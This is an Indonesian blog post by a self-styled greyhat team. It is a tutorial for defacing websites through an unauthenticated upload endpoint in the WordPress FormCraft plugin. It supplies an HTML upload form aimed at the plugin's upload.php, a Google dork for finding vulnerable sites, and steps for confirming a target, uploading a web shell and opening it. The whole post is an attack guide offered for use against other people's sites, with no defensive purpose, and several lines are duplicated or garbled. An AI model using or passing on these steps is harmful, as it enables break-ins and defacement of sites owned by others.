TUTORIAL CARA DEFACE METODE WORDPRESS FORMCRAFT UPLOAD
Deface menggunakan metode Upload Formcraft. Metode ini masih baru dan banyak terdapat website vuln karena banyak yang belum mengetahui metode ini. berikut deface menggunakan metode formcrat wordpress plugin upload form :
BAHAN-BAHAN :
1. SHELL
2. CSRF
3. Dork
CSRF Scrip:
2. CSRF
3. Dork
CSRF Scrip:
================================================================================
<form action="http://localhost/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data" method="POST">
<input name="files[]" type="file" /><button>Upload</button></form>
================================================================================
Exploitnya: wp-content/plugins/formcraft/file-upload/server/php/upload.php
Dork: inurl:/wp-content/plugins/formcraft
CARANYA
1. Buka Google..Cari website menggunakan dork diatas
2. Jika website terdapat indikasi Vuln terdapat pesan syntax error "Failed:no file found"
3. Setelah mendapatkan target masukan Exploit dibelakang URL akhir website tersebut.
4. Masukan site target ke CSRF (simpan dengan extensi *.html)
5.Upload Shell,, Lalu buka..
.jpg "Deface menggunakan metode Upload Formcraft. Metode ini masih baru dan banyak terdapat website vuln karena banyak yang belum mengetahui metode ini. berikut deface menggunakan metode formcrat wordpress")
http://localhost/wp-content/plugins/formcraft/file-upload/server/php/files/-namashell.php
Deface menggunakan metode Upload Formcraft. Metode ini masih baru dan banyak terdapat website vuln karena banyak yang belum mengetahui metode ini.
Selesai.. semoga bermanfaat..
Posted By : FouR[B347]F - FAITH GREYHAT TEAM.
No comments for "TUTORIAL CARA DEFACE METODE WORDPRESS FORMCRAFT UPLOAD"